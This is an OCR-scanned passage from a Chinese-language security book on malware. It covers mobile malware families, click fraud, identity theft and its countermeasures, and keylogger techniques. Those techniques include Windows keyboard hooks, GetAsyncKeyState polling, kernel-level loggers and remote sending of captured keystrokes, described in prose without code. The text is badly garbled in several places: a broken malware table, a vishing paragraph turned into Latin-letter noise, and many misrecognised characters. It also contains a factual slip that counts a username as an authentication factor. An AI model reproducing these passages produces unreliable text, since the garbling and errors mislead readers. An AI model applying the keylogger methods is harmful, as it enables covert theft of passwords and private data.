你 的 手机 恢复 


Konov.A 2008 | 基于 J2ME 的 应 用 程序 





( 续 ) 
恶意 软件 注入 /传播 技术 恶意 软件 目标 / 意图 


i 这 个 恶意 Eik FRUT onal BI Ma 


KBlock.A 文件 / 应 用 程序 执行 E PEA EREEREER ARA 
REKNIR DWR, EEKE 





PbBlister.A 2009 | 应 用 程序 安装 、 、 
Biz 实用 程序 安装 访问 手机 上 符合 某 个 条 件 的 数据 
这 个 恶意 软件 设计 用 于 究 取 TAN (交易 验证 编码 )。 

ZeuS Mobile aka ZitM 2010 | 应 用 程序 安装 

euS Mobile aka ZitMo 210 | 应 用 程序 安装 这 些 编码 由 银行 通过 短 消 息 发 送 
DroidDrean 2011 应 用 程序 安装 这 个 恶意 软件 窃取 SMS 和 通话 日 志 

这 个 恶意 软件 拦截 和 记录 SMS 和 通话 ， 然 后 将 数据 

ShrewdCKS 2014 | 应 用 程序 安装 

ES 上 传 到 攻击 者 控制 的 服务 器 





了 含 恶 意 软件 代码 的 MMS 视频 消息 ， 
Stagefright as | if PEt ey 加 —_~Nm 
又 


2.1.4 ”点 击 欺诈 


点 击 欺 诈 是 互联 网 犯罪 的 一 种 形式 ， 发 生 在 按 单 击 付费 的 在 线 广告 中 ， 一 个 人 、 脚 本 或 者 计算 机 程序 模仿 一 个 系统 的 Web 
浏览 器 的 实际 用 户 单 击 广告 ， 以 产生 受害 人 所 不 知晓 的 收入 。 黑 客 还 可 能 向 不 知 真相 的 受害 人 传送 点 击 欺诈 恶意 软件 。 犯 罪 分子 
所 单 击 以 赚 取 利润 的 实际 广告 几乎 都 是 受害 人 所 不 感 兴趣 的 。 单 击 欺诈 是 一 些 辩论 和 越 来 越 多 诉讼 的 主题 ， 因 为 广告 网 络 从 无 认 
的 消费 者 受到 的 欺诈 中 获 利 。 


按 单 击 付费 广告 


按 单 击 付费 广告 (Pay-per-click advertising, PPC advertising) 是 一 种 广告 方案 ， 网 站 管理 员 作 为 发 布 者 ， 显 示 来 自 广 
告 商 的 可 单 击 链接 ， 按 照 单 击 数量 收费 。 当 今 最 大 的 广告 网 络 是 Google 的 AdWordsAdSense、 必 应 广告 和 Yahool 广告 这 些 
公司 都 具有 双重 角色 ， 因 为 它们 也 是 (自己 的 搜索 引擎 上 ) 互联 网 内 容 的 发 布 者 。 这 种 大 公司 具备 双重 角色 的 情况 可 能 导致 利益 
冲突 ,例如 ， 对 于 未 察觉 到 的 单 击 欺 诈 ， 这 些 公 司 付 费 给 广告 商 时 损失 了 金钱 ， 但 是 当 它 们 定期 从 广告 商 那 里 收费 时 却 赚 取 了 更 
多 的 钱 。 由 于 Google 或 者 Yahoo! 从 广告 商 那 里 收取 的 费用 和 付出 费用 之 间 的 差异 ， 它 们 直接 而 无 形 地 从 单 击 欺 诈 中 获 利 。 


@ i 单 击 欺诈 威胁 





这 种 单 击 欺诈 类 型 是 以 不 属于 按 单 击 收费 广告 协议 当事人 的 非 缔约 方 作为 基础 的 。 协 议 各 方 之 间 责 任 的 缺失 可 能 在 按 单 击 收 


费 广 告 过 程 中 引入 犯罪 因素 。 以 下 是 非 缔约 方 的 一 些 例子 : 


广告 商 竞争 ”有 些 团体 可 能 希望 通过 单 击 竞 争 者 的 广告 来 给 竞争 对 手 造成 损害 。 这 不 可 避免 地 连 使 广告 商 为 不 相关 的 单 击 
(而 不 是 客户 驱动 的 ) 付费 。 





内 容 出 版 商 竞争 ”这 些 团 体 可 能 希望 陷害 特定 的 内 容 出 版 商 ， 以 便 驱 使 广告 商 使 用 自己 的 内 容 出 版 公司 。 有 这 种 情况 ， 亚 
意 的 内 容 出 版 商 造成 别 的 内 容 出 版 商 比 客户 更 多 地 单 击 广告 的 假象 ， 广 告 商 可 能 因此 决定 结束 与 这 些 内 容 出 版 商 的 合作 关系 。 许 
多 内 容 出 版 商 的 收入 来 源 只 依靠 广告 ， 这 样 的 攻击 可 能 使 其 破产 。 


* 恶意 目的 ”和 破坏 公物 或 者 网 络 恐 怖 分 子 一 样 ， 对 广告 商 或 者 内 容 出 版 商 造成 危害 有 许多 动机 ， 甚 至 跟 收 益 无 关 。 这 些 动 
机 可 能 包括 政治 的 、 个 人 的 甚至 基于 集团 公司 的 她 恨 。 这 些 情 况 往 往 最 难以 识别 ， 因 为 识别 甚至 追查 罪犯 很 困难 ， 即 使 找到 了 罪 
犯 ， 也 几乎 无 法 进行 诉讼 ， 因 为 互联 网 允许 很 多 匿名 的 活动 。 


2.1.5 “身份 盗窃 


身份 盗窃 可 以 用 于 支持 包括 非法 移民 、 陈 怖 主义 、 毒 品 买卖 、 间 读 、 勒 索 、 信 用 欺诈 以 及 医疗 保险 欺诈 等 犯罪 行为 。 某 些 人 
可 能 因为 非 财 务 的 原因 而 企图 假冒 别人 ， 比 如 为 了 受害 者 的 成 就 所 得 到 的 赞扬 和 名 誉 。 与 恶意 软件 一 同 使 用 ， 身 份 盗 窃 可 以 取得 
你 的 互联 网 身份 以 便 访问 你 的 网 上 账户 。 这 些 账 户 可 能 包括 你 的 电子 邮件 账户 一 一 你 的 ISP 和 Webmail 账 户 一 一 PayPal、 
eBay、Twitter、Facebook、Instagram、 银 行 账户 ， 以 及 其 他 个 人 网 上 账户 。 


攻击 者 可 以 使 用 所 有 这 些 窃取 来 的 信息 假扮 成 受害 人 ， 以 窃取 个 人 信息 、 金 钱 或 者 其 他 物品 。 最 终 ， 通 过 穷 取 你 的 网 上 身 


份 ， 黑 客 可 以 用 这 种 假象 将 恶意 软件 散布 到 你 的 朋友 和 杀 属 那里 。 在 下 几 个 小 节 中 ， 我们 将 简短 地 介绍 一 些 身份 盗窃 的 类 型 ,使 
你 更 好 地 理解 它们 。 本 小 节 中 ， 我 们 将 讨论 各 种 形式 的 身份 盗 穷 。 首 先 ， 来 看 看 下 面 这 些 图 表 中 所 显示 的 国际 上 身份 盗窃 类 型 和 


窃取 或 者 诈骗 得 来 的 信息 的 使 用 方法 的 平均 比率 。 
财务 身份 盗窃 


这 种 类 型 的 欺诈 通常 涉及 受害 者 的 银行 账户 和 /或 个 人 信息 ， 犯 罪 分 子 可 以 使 用 现 有 的 或 者 开 立 新 的 信用 或 者 账户 额度 。 在 
过 程 中 犯罪 分 子 通过 提供 受害 者 的 准确 姓名 、 地 址 、 生 日 或 者 验证 身份 所 必需 的 其 他 个 人 信息 来 假冒 受害 者 。 这 种 类 型 的 身 
穷 现在 十 分 普遍 ， 你 的 朋友 中 可 能 有 1/5 曾 经 遭遇 过 这 种 欺诈 。 


这 个 
份 


| 
R 
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身份 盗 禄 类 型 


E 信用 卡 欺诈 

E 电话 和 公用 事业 欺诈 
E 银行 欺诈 

E 职业 欺诈 

轩 政府 文件 和 救济 金 欺诈 
E 贷款 欺诈 

LJ 其 他 

国 尝试 性 的 欺诈 




















盆 取 的 信息 如 何 使 用 

进入 信用 卡 账户 
进 

进 

进入 互联 网 账户 
进 


入 保险 账户 
其 他 





刑事 身份 盗窃 


这 种 类 型 的 身份 盗窃 发 生 在 犯罪 分 子 使 用 你 的 身份 进行 犯罪 活动 时 ， 万 一 被 警察 或 者 组 织 的 安全 团队 抓获 ， 你 的 证 件 将 被 用 
来 转移 犯罪 分 子 及 其 活动 的 嫌疑 。 如 果 所 犯 的 是 个 小 过 错 ， 除 非 发 生 在 本 州 范 围 内， 否则 这 些 人 绝 不 会 知道 自己 已 经 成 为 这 种 盗 
窃 的 受害 者 ， 但 是 更 严重 的 过 错 可 能 导致 他 们 被 捕 。 





几乎 在 所 有 情况 下 ， 犯 罪 分 子 必 须 掌握 某 个 人 的 个 人 可 辨识 信息 (personally identifiable information, Pll) 或 者 文档 ， 
以 便 在 生活 中 或 者 互联 网 上 假冒 他 ， 犯 罪 分 子 通 过 下 列 手段 达到 这 个 目的 : 


- 窃取 信件 或 者 在 垃圾 堆 中 翻 找 含有 个 人 信息 的 废 纸 (GR) 。 几 年 以 前 ， 我 的 一 位 工作 于 美国 政府 情报 署 的 邻居 的 垃圾 桶 
在 半夜 被 一 群 讲 外 国 话 的 家 伙 翻 找 了 一 遍 ， 所 以 要 知道 你 所 丢掉 的 是 什么 。 这 也 适用 于 你 的 计算 机 的 回收 站 中 的 已 删除 项 目 和 / 
或 留 在 “我 的 文档 ”文件 夹 或 者 /home/use/%name% 目 录 的 旧 文 件 。 


. 研究 政府 登记 、 互 联网 搜索 引擎 或 者 公共 记录 搜索 服务 中 关于 受害 者 的 信息 。 
` 使 用 你 自己 安装 的 程序 窃取 个 人 或 者 账户 信息 ， 以 便 登 录 到 可 收集 到 更 多 信息 的 厂商 网 站 。 


* 安装 击 键 记录 程序 窃听 你 的 键盘 输入 ， 以 便 窃取 个 人 信息 、 密 码 、 朋 友 的 信息 、 教 育 状况 ， 或 者 能 够 取得 个 人 数据 的 专业 


" 从 受害 者 工作 场所 的 公司 计算 机 数据 库 窃 取 个 人 信息 。 攻 击 者 可 以 使 用 恶意 软件 进行 这 项 工作 (AARD, WAE) o 


- 虚假 的 职务 提供 信息 通知 (全 职 或 者 在 家 工作 ) ， 使 受害 者 天 真 地 回复 全 名 、 地 址 、 履 历 、 电 话 号 码 、 银 行 详细 信息 或 者 


安全 许可 等 级 。 


: 通过 在 电子 邮件 中 假冒 一 个 受到 信任 的 机 构 ， 例 如 一 家 公司 、 学 校 或 者 组 织 ， 对 受害 者 进行 社会 工程 以 诱骗 其 打开 附件 ， 
从 而 向 受害 者 的 计算 机 注入 恶意 软件 ， 导 致 个 人 信息 的 盗窃 。 


- 利用 受害 者 的 社交 网 络 (Twitter, Facebook, Bebo, LinkedIN, Livejournal) 来 了 解 受害 者 的 更 多 详细 信息 ， 还 可 能 利用 


害 者 的 亲友 来 散布 /传播 恶意 软件 和 窃取 更 多 的 身份 。 


ie 


ATED A (Vishing) o JURA TRA IRSS RA MMAR KEL EA WAT RUD A tito KS GAGS Ae, APE 
目标 交 出 信息 ， 可 能 包括 受害 人 的 社会 保险 号 码 和 调整 后 的 总 收入 数目 。 在 大 部 分 情况 下 ， 可 以 利用 这 两 种 信息 查 出 个 人 税务 信 


* 改变 你 的 电子 邮件 地 址 ， 从 而 将 账户 更 新 、 账 单 或 者 账户 报告 转移 到 另 一 个 位 置 ， 以 得 到 常用 账户 信息 或 者 推迟 身份 盗 帘 
被 发 现 的 时 间 。 


Ə 个 人 身份 盗窃 对 策 


om 


对 于 所 有 受害 者 来 说， 最 困难 的 是 在 发 生 身份 盗窃 时 清除 记录 。 对 于 某 些 人 来 说 ， 即 使 清除 信用 评级 也 将 人 花费 几 个 月 甚至 几 
年 的 时 间 。 但 是 ， 知 道 这 一 切 是 如 何 发 生 的 将 带 给 你 一 些 重要 的 思路 ， 以 保护 自己 和 降低 你 暴露 在 这 种 威胁 下 的 程度 。 犯 罪 分 子 
将 会 做 任何 便于 窃取 你 的 身份 以 完成 其 “宏伟 计划 ”所 需 的 事情 。 对 于 基于 恶意 软件 的 威胁 ， 你 最 起 码 要 知道 你 所 访问 的 网 站 以 
及 网 站 上 所 显示 的 内 容 。 


. 这 是 供 许多 人 报告 问题 的 非常 流行 的 网 站 吗 ? 

. 这 个 网 站 是 否 有 可 疑 的 名 称 ， 例 如 与 www.paypal.com 相 似 的 www.pay.pal.com。 
- 在 你 单 击 之 前 了 解 单 击 的 是 什么 。 

. 在 开始 输入 个 人 信息 之 前 了 解 网 站 。 

. 了解 你 从 互联 网 下 载 和 /或 安装 的 内 容 : 

. 这 是 来 自 受 尊重 的 网 站 的 著名 程序 吗 ? 


. 这 是 来 自 一 个 可 疑 网 站 的 著名 程序 吗 ? 





* 安装 程序 后 ， 在 你 的 PC 上 有 没有 发 生 什么 奇怪 的 事情 ? 


获得 个 人 身份 通过 严重 地 破坏 隐私 而 成 为 可 能 。 对 于 用 户 来 说 ， 这 主要 是 因为 轻信 而 向 别人 提供 信息 。 在 某 些 情况 下 ， 犯 罪 
分 子 通过 实物 资 穷 、 社 会 工程 或 者 基于 恶意 软件 的 数据 盗窃 取得 文档 或 者 个 人 身份 。 保 护 你 的 计算 机 上 的 个 人 信息 对 于 防止 身份 
盗窃 是 很 关键 的 ， 这 可 以 用 很 多 方法 实现 ， 如 果 将 这 些 方 法 都 列 出 来 ， 你 会 对 如 此 之 多 的 选项 感到 惊讶 。 但 是 ， 因 为 这 是 对 策 的 
部 分 ， 我 们 将 仅仅 介绍 其 中 的 一 部 分 ， 以 便 为 你 提供 一 些 最 佳 的 建议 。 始 终 要 记 住 一 点 ， 安 全 保护 越 强 大 ， 你 就 越 可 能 防止 身份 
盗 穷 。 如 果 你 确实 被 恶意 软件 感染 ， 它 已 经 在 你 的 计算 机 上 运行 ， 那 么 只 有 如 下 这 些 安全 措施 能 够 保护 你 : 


. 三 因素 身份 认证 ”使 用 三 部 分 的 身份 认证 过 程 ， 包 括 一 个 用 户 名 (你 是 谁 ) ， 一 个 密码 (你 所 知道 的 某 件 事情 ) ， 以 及 一 
个 安全 ID 或 者 安全 令 牌 (你 所 拥有 的 某 个 东西 ) 。 这 种 方法 现在 提供 给 了 暴雪 娱乐 公司 的 《魔兽 世界 》 的 玩家 (我 的 名 字 
是 “Go Alliance, Die Horde” ) ， 它 被 称 为 暴雪 密码 保护 器 (Blizzard Authenticator) ， 使 用 每 30 秒 变化 一 次 的 6 位 数字 。 没 有 这 


个 令 牌 ， 窃取 魔 兽 的 账户 是 不 可 能 的 。 这 种 方法 也 适用 于 使 用 SecureComputing 或 RSA SecutID 令 牌 的 大 公司 。 

. 计算 机 身份 认证 系统 ”例如 ，Pretty Good Privacy (PGP， 汉 语意 思 为 : 相当 好 的 隐私 ) 或 者 GNU 隐 私 保护 (GNU Privacy 
Guard, GPG) 要 求 用 户 在 每 次 传送 以 及 /或 者 提供 常规 的 个 人 信息 时 进行 验证 ， 以 持续 地 工作 于 安全 文档 之 上 。 这 些 程序 还 提供 
了 能 够 抵御 一 些 类 型 的 恶意 软件 的 保护 空间 。 


- 脱 机 安全 数据 存储 ”将 你 的 数据 转移 到 安全 的 脱 机 可 移动 设备 上 ， 仅 在 使 用 这 些 数据 时 将 设备 插入 系统 ， 这 种 方法 是 有 帮 
助 的 ， 虽 然 这 种 方法 不 完美 ， 但 是 在 容易 被 恶意 软件 或 者 黑客 访问 的 计算 机 上 存储 的 个 人 信息 越 少 越 好 。 


. 密码 锁 “这 种 服务 在 互联 网 上 到 处 都 有 提供 ， 作 为 一 种 单 点 登录 (single-sign-on, SSO) 的 手段 ， 或 者 付费 安全 地 存储 你 
的 所 有 密码 ， 使 其 不 会 在 计算 机 上 缓存 中 或 者 写 在 存储 于 PC 或 者 桌面 上 的 文件 中 。 绝 不 要 像 菜 些 人 那样 ， 将 你 的 用 户 名 /密码 、 
信用 卡 /有 效 期 /信用 卡 验证 码 以 及 社会 保险 号 码 /出 生日 期 存储 在 任何 文本 文件 或 者 容易 访问 解密 的 文档 。 


2.1.6 击 键 记录 


在 这 个 小 节 中 ， 我 们 将 讨论 击 键 记录 程序 的 功能 和 用 这 些 程序 所 能 收集 到 的 信息 ， 以 及 这 些 信息 如 何 用 于 从 主机 上 窃取 信 
息 。 为 了 契合 本 书 的 主题 ， 我 们 将 专注 于 基于 恶意 软件 的 击 键 记录 功能 。 但 是 ， 注 意 其 他 类 型 的 击 键 记录 也 很 重要 ， 因 为 一 台 计 
算 机 受到 感染 ， 通 过 使 用 它 的 红外 端口 、 麦 克 风 和 /或 无 线 接口 ， 可 以 抽取 在 受 感 染 机 器 同一 学 围 内 的 其 他 机 器 的 击 键 。 大 部 分 
这 种 信息 可 以 看 作 本 书 第 二 部 分 中 Rootkit 有 关 章 节 的 开篇 或 者 概述 ， 在 第 二 部 分 中 将 详细 讨论 用 户 和 内 核 模式 钩子 技术 和 
Rootkit 的 内 部 工作 机 制 。 


本 地 机 器 软件 击 键 记录 程序 


这 些 程序 是 试图 工作 于 目标 计算 机 操作 系统 上 的 软件 。 从 技术 的 角度 看 ， 有 3 种 类 型 的 软件 击 键 记录 程序 。 


基于 内 核 “这 种 方法 是 最 难以 编写 同时 也 是 最 难以 对 付 的 。 这 种 击 键 记录 程序 存在 于 内 核 级 别 ， 因 此 实际 上 不 可 见 。 它 们 几 
乎 总 是 在 暗中 破坏 OS 内 核 ， 并 且 得 到 对 硬件 的 未 经 许可 访问 权 ， 这 使 它们 非常 强大 。 例 如 ， 使 用 这 种 技术 的 击 键 记 录 程 序 可 以 
像 键盘 驱动 程序 一 样 工作 ， 从 而 在 键盘 上 输入 的 信息 发 送 给 Os 的 时 候 进行 捕捉 。 


基于 Windows: GetMessage/PeekMessage 你 可 以 尝试 直接 与 这 些 API 挂 钩 ， 以 捕获 WM_CHAR 信 息 。WM_CHAR 消 
息 由 键盘 在 TranslateMessage 函 数 翻 译 WM_KEYDOWN 消 息 时 发 送 到 一 个 窗口 。GetMessage () 和 PeekMessage () 函数 
都 用 于 在 Windows 消 息 队列 中 的 进出 ， 消 息 队列 与 键盘 输入 相连 。 这 些 函 数 都 与 GDI 函 数 相关 ， 在 user32.dll 中 定 
义 ，user32.dll 调 用 ntdll.dll， 之 后 再 传递 给 W32k.sys， 而 W32k.sys 位 于 与 用 户 空间 相对 的 内 核 空 间 中 。 所 以 ， 如 果 企 图 获得 内 
核 访问 权 以 进行 击 键 记录 ， 这 是 一 种 可 用 的 方法 。 


基于 Linux ”Sebek 是 一 个 广为人知 的 白 幅 输入 记录 工具 ， 运 行 于 多 种 版 本 的 Linux 内 核 之 上 。 这 是 一 个 核心 补丁 ， 本 来 是 开 
发 用 来 捕捉 蜜 钠 和 入 侵 者 之 间 交 互 的 。 第 4 章 中 将 更 深入 地 讨论 这 个 工具 ,简单 地 说 ， 它 被 配置 以 捕捉 来 自 系统 调 用 的 读 写 活 
动 。 


基于 钩子 ” 击 键 记录 程序 与 0S 提 供 的 键盘 API 挂 钩 。 使 用 钩子 的 问题 是 系统 响应 时 间 的 增加 可 能 降低 整个 系统 的 性 能 。 所 
以 ， 简 而 言 之 ， 通 过 内 核 直接 操作 要 高 效 得 多 。 但 是 ， 因 为 大 部 分 恶意 软件 利用 钩 子 ， 所 以 我 们 也 将 作 一 些 介绍 。 


- WH_JOURNALPLAYBACK ”这 个 钩子 为 应 用 程序 提供 在 系统 队列 中 插入 消息 的 能 力 。 当 你 希望 回放 从 鼠标 或 者 键盘 捕捉 
到 的 多 个 事件 序列 时 ， 使 用 WH_JOURNALRECORD。 


 WH JOURNALRECORD 这 个 钩子 为 应 用 程序 提供 记录 和 监控 多 种 输入 事件 的 能 力 。 你 可 以 使 用 这 个 钩子 来 记录 和 存储 
来 自 整个 系统 的 信息 ， 然 后 使 用 WH_ JOURNAL PLAYBACK 来 分 析 数 据 输入 。 


-WH_KEYBOARD 这 个 钩子 使 应 用 程序 能 够 监控 直接 来 自 键盘 的 原始 消息 流量 ， 键 盘 消 息 由 GetMessage 或 者 PeekMessape 


函数 返回 。 


- WH_MOUSE LL 和 WH_MOUSE 这些 钩 子 都 与 捕 提 和 回放 消息 队列 中 的 鼠标 输入 事件 相关 。 


独特 的 方法 ”这 里 ， 黑 客 使 用 类 似 GetAsyncKeyState 和 GetForegroundWindow 这 样 的 函数 记录 关于 哪个 窗口 拥有 焦点 以 
及 键盘 上 每 个 键 的 状态 的 信息 ， 告 诉 黑客 什么 信息 正在 被 输入 哪个 窗口 。 从 实现 的 角度 看 ， 这 种 方法 比较 简单 ， 但 是 这 要 求 每 个 
键 的 状态 每 秒 钟 被 轮 询 多 次 ， 这 显然 导致 了 CPU 的 高 使 用 率 ， 并 且 可 能 因为 数据 进程 可 能 不 时 被 锁定 而 丢失 一 些 击 键 。 但 是 ， 
熟练 的 编程 人 员 能 够 克服 这 些 限 制 ， 轻 易 地 每 秒 轮 询 键盘 状态 数 百 次 ， 并 且 不 会 显著 地 增加 CPU 的 使 用 。 


远程 访问 软件 击 键 记 录 程 序 


这 种 程序 是 为 本 地 软件 击 键 记录 程序 配置 了 附加 的 特性 ， 能 够 广播 从 目标 计算 机 记录 到 的 数据 ， 使 这 些 数据 可 以 从 远程 监控 
到 。 一 般 来 说 ， 这 些 信 息 通过 FTP、 电 子 邮 件 、 硬 件 设备 发 送 ， 犯 罪 分 子 也 可 能 登录 到 受害 者 的 计算 机 查看 预先 配置 好 的 击 键 记 
录 程 序 收集 的 任何 数据 。 








恶意 软件 发 布 者 可 以 设计 隐蔽 信道 来 登录 到 击 键 记 录 应 用 程序 ， 或 者 向 击 键 记 录 程 序 提供 将 捕捉 的 数据 发 送 给 发 布 者 的 隐蔽 
方法 。 还 有 其 他 多 种 类 型 的 键盘 记录 程序 ， 但 是 我 们 不 打算 加 以 介绍 ， 因 为 它们 超出 了 本 书 的 范围 。 


o 击 键 记 录 程 序 攻击 : 电子 邮件 击 垮 两 位 主持 人 一 一 击 键 记 录 程 序 是 幕后 推手 





未 经 许可 的 人 侵犯 你 的 个 人 和 公司 隐私 可 能 是 毁 次 性 的 。 当 犯罪 分 子 访问 到 你 的 个 人 或 者 公司 信息 时 ， 可 能 导致 许多 你 不 愿 
意 看 到 的 灾难 。 下 面 我 们 来 看 看 2008 年 未 公布 的 对 新 闻 工 作者 的 攻击 。 


关于 这 个 事件 有 很 多 文章 报道 ， 这 里 只 提供 一 个 梗概 。 一 位 资深 的 电视 播音 员 被 控告 非法 访问 前 合作 主持 人 的 电子 邮件 账 
户 ， 她 显然 知道 个 人 详细 情况 被 泄露 给 搬 弄 是 非 的 专栏 作家 ， 这 最 终 导 致 她 被 开除 出 新 闻 台 。 根 据 各 种 文章 报道 ， 黑 客 在 她 的 电 
子 邮件 中 使 用 了 基于 硬件 的 击 键 记 录 程 序 ， 这 个 程序 秘密 地 存储 所 有 她 输入 到 系统 的 击 键 ， 包 括 个 人 信息 ， 最 重要 的 是 还 有 公司 


和 私人 电子 邮件 账户 的 密码 。 


Ə 击 键 记录 程序 对 策 
击 键 记录 程序 严重 威胁 隐私 ， 但 是 你 可 以 采取 措施 缓解 它们 的 威胁 。 


软件 击 键 记录 程序 ”目前 ,没有 简单 的 防止 击 键 记录 的 方法 。 未 来 ， 具 备 安全 I/O 的 软件 也 许 能 防止 击 键 记录 程序 ， 在 此 之 
前 ,最 好 的 计划 是 使 用 常识 并 组 合 使 用 多 种 方法 。 使 用 软件 跟踪 键盘 的 连接 性 并 且 记 录 其 不 存在 的 情况 可 以 作为 对 抗 物 理 击 键 记 
录 程 序 的 措施 。 这 种 方法 在 PC 几乎 始终 开启 的 情况 下 有 意义 。 


代码 签名 (code signing) ”Windows 的 64 位 版 本 实施 内 核 模式 设备 驱动 程序 的 强制 数字 签名 ， 从 而 限制 了 键盘 记录 
Rootkit 的 安装 。 这 种 方法 要 求 所 有 内 核 模式 代码 具有 自己 的 数字 签名 。 对 于 更 新 的 为 Vista 和 之 后 的 系统 开发 的 Windows 组 件 
也 有 同样 的 要 求 。 这 种 方法 将 证 明 已 安装 的 软件 是 合法 的 ， 来 源 于 确定 的 出 处 或 者 应 用 程序 发 行者 。 这 个 过 程 在 Microsoft 
Windows 的 早期 版 本 和 基于 Unix 的 操作 系统 的 早期 版 本 中 都 不 存在 。 


除非 所 有 内 核 模式 的 软件 、 设 备 驱动 程序 、 受 保护 的 驱动 程序 ， 以 及 发 送 任何 活动 受 保护 内 容 的 驱动 程序 都 受到 Windows 
的 代码 完整 性 功能 的 保护 ， 否 则 上 述 的 代码 签名 类 型 就 无 法 存在 。 这 种 代码 完整 性 功能 是 Microsoft 为 确保 用 户 能 够 在 管理 员 查 
阅 系统 日 志 识 别 系统 错误 时 提供 帮助 的 最 新 措施 。 你 可 以 访问 Microsoft 的 网 站 (http://www.microsoft.com) 了 解 这 一 代码 
完整 性 功能 的 更 多 细节 。 


2015 年 ，Microsoft 推 出 了 设备 保护 (Device Guard) ， 这 是 Windows10 中 的 一 种 新 型 安全 机 制 。 根 据 Microsoft 的 说 
法 ， 这 种 新 功能 为 组 织 提 供 了 锁定 设备 、 防 御 新 型 未 知 恶 意 软 件 变种 的 能 力 。 你 可 以 控制 设备 保护 信任 的 来 源 ， 它 自 带 的 工具 可 
以 简化 通用 应 用 程序 的 签名 ， 甚 至 可 以 处 理 软件 供应 商 原 先 设 计时 未 签名 的 Win32 应 用 。 


程序 监控 (program monitoring) ”你 应 该 经 常 审核 安装 在 计算 机 上 的 应 用 程序 。 如 果 定 时 进行 这 种 审核 ， 你 应 该 能 够 很 
容易 地 发 现 悄 悄 地 自行 安装 在 你 的 计算 机 上 的 新 程序 一 一 这 些 程 序 和 间谍 软件 、 广 告 软件 有 关 ， 或 者 就 是 个 恶意 的 安装 。 


用 反 间 谍 (Anti-Spyware) 程序 进行 检测 ”大 部 分 反 间 谍 程 序 试图 检测 活动 的 击 键 记录 程序 并 且 尽 可 能 地 清除 这 些 程序 。 
你 一 般 只 能 通过 更 可 靠 的 反 间 谍 程 序 供 应 商 得 到 这 种 级 别 的 支持 ， 而 不 知名 的 供应 商 实 际 上 往往 可 能 支持 一 些 间谍 软件 供应 商 。 


需要 注意 的 是 ， 防 恶意 软件 解决 方案 已 经 加 入 了 间谍 软件 和 广告 软件 检测 功能 ， 成 为 检测 各 种 恶意 软件 的 一 站 式 解 决 方案 。 


防火 墙 “这些 应 用 程序 保护 你 的 计算 机 避免 未 经 许可 的 入 站 和 出 站 通信 ， 尽 管 防火 墙 很 擅长 这 方面 的 工作 ， 但 是 键盘 记录 程 
序 仍 会 试图 完成 其 工作 一 一 记录 计算 机 的 输入 。 但 是 ， 如 果 键 盘 记 录 程序 试图 将 收集 的 数据 发 送 给 犯罪 分 子 ， 而 你 的 防火 墙 被 
配置 为 阻止 所 有 的 出 站 通信 或 者 对 所 有 的 出 站 连接 尝试 提出 警告 ， 你 的 系统 将 更 有 可 能 避免 键盘 记录 程序 传送 所 捕捉 的 输入 。 


网 络 入 侵 检 测 /预防 系统 (NIDS/NIPS) ”这 些 系统 能 够 对 所 有 接触 企业 范围 内 网 络 设备 的 任何 网 络 通信 提出 警告 。NIDS 
会 清晰 地 识别 试图 建立 入 站 和 出 站 网 络 连 接 的 未 加 密 键盘 记录 程序 信息 传输 。 如 果 这 些 传输 被 加 密 ，NIDS 可 能 很 难 将 这 种 网 络 
活动 识别 为 确定 的 键盘 记录 程序 通信 ， 而 只 会 看 到 一 个 未 知 连 接 的 警告 。 不 管 IDS/IPS 系 统 是 基于 网 络 或 者 主机 的 ， 都 应 该 对 试 
图 发 送 自身 信息 的 出 站 连接 (phone home 行 为 ) 提出 警告 。 


智能 卡 ” 因 为 智能 卡 上 的 集成 电路 ， 使 得 它们 不 会 受到 键盘 记录 程序 和 其 他 记录 行为 的 影响 。 智 能 卡 可 以 处 理 信息 并 且 在 你 
每 次 登录 时 返回 一 个 唯一 的 口令 。 你 一 般 不 能 用 相同 的 信息 再 次 登录 。 这 种 方法 为 安全 系统 增加 了 更 多 的 验证 因素 ， 使 恶意 程序 
更 加 难以 作为 有 效用 户 验证 。 利 用 加 密 系统 ， 每 当 你 登录 时 ， 系 统 模拟 我 们 稍 候 将 要 讨论 的 一 种 强 有 力 的 加 密 过 程 ( 称 为 三 因素 
身份 认证 ) 。 除 非 你 能 够 破解 这 种 算法 (这 几乎 不 可 能 ) ， 否 则 这 种 方法 几乎 不 会 被 破坏 。 


反 键 盘 记 录 程 序 ”也 可 以 使 用 键盘 记录 程序 发 现 软件 ， 这 种 软件 使 用 一 组 “特征 码 ” 和 所 有 已 知 键盘 记录 程序 的 列表 ， 能 够 
删除 这 些 键 盘 记 录 程 序 。PC 的 合法 用 户 能 够 根据 这 个 列表 随时 进行 扫描 ， 在 硬盘 上 查找 目录 中 的 项 目 。 这 种 保护 的 缺点 是 ， 它 
只 能 根据 基于 特征 码 的 键盘 记录 程序 列表 进行 保护 ， 而 对 列表 之 外 的 其 他 键盘 记录 程序 来 说 PC 仍然 是 脆弱 的 。 


还 有 许多 本 章 中 没有 介绍 的 对 抗 键盘 记录 程序 的 概念 性 方法 。 但 是 ， 我 们 已 经 尝试 列 出 了 在 我 们 的 教程 中 遇 到 的 安全 操作 程 
序 中 最 常用 的 方法 。 


2.1.7 ”恶意 软件 的 表现 


间谍 程序 很 少 在 一 台 计 算 机 上 独立 存在 : 受到 感染 的 机 器 可 能 很 快 地 受到 许多 其 他 组 件 的 感染 。 用 户 常 常会 注意 到 不 希望 出 
现 的 行为 和 系统 性 能 的 下 降 。 间 谍 软件 的 感染 可 能 造成 不 希望 出 现 的 CPU 占 用 率 、 永 久 的 磁盘 占用 ， 以 及 不 希望 出 现 的 网 络 流 
量 ， 所 有 这 些 都 降低 电脑 的 速度 。 像 应 用 程序 或 者 系统 范围 内 的 崩 演 这 样 的 稳定 性 和 性 能 问题 也 常 随 着 间谍 程序 而 出 现 。 间 谍 软 
件 一 般 会 干扰 网 络 软 件 ， 使 其 难以 连接 到 互联 网 。 


有 些 间谍 软件 的 感染 甚至 不 被 用 户 所 察觉 。 用 户 以 为 这 些 情 况 是 由 硬件 、Windows 安 装 问题 或 者 病毒 引起 的 。 有 些 严重 感 
染 的 系统 的 拥有 者 联络 技术 支持 专家 ， 甚 至 因为 现 有 系统 “ 变 得 太 慢 ”而 购买 一 台新 的 计算 机 。 严 重 感染 的 系统 可 能 需要 所 有 软 
件 的 一 次 干净 的 重新 安装 ， 才 能 恢复 全 部 功能 。 单 独 一 个 软件 很 少 使 一 台电 脑 不 可 用 ， 除 非 它 分 布 到 更 多 的 系统 服务 中 。 


有 些 其 他 类 型 的 间谍 软件 (例如 Targetsoft) 修改 系统 文件 ， 这 使 得 它们 更 难以 删除 。Targetsoft 修 改 Windows Winsock 
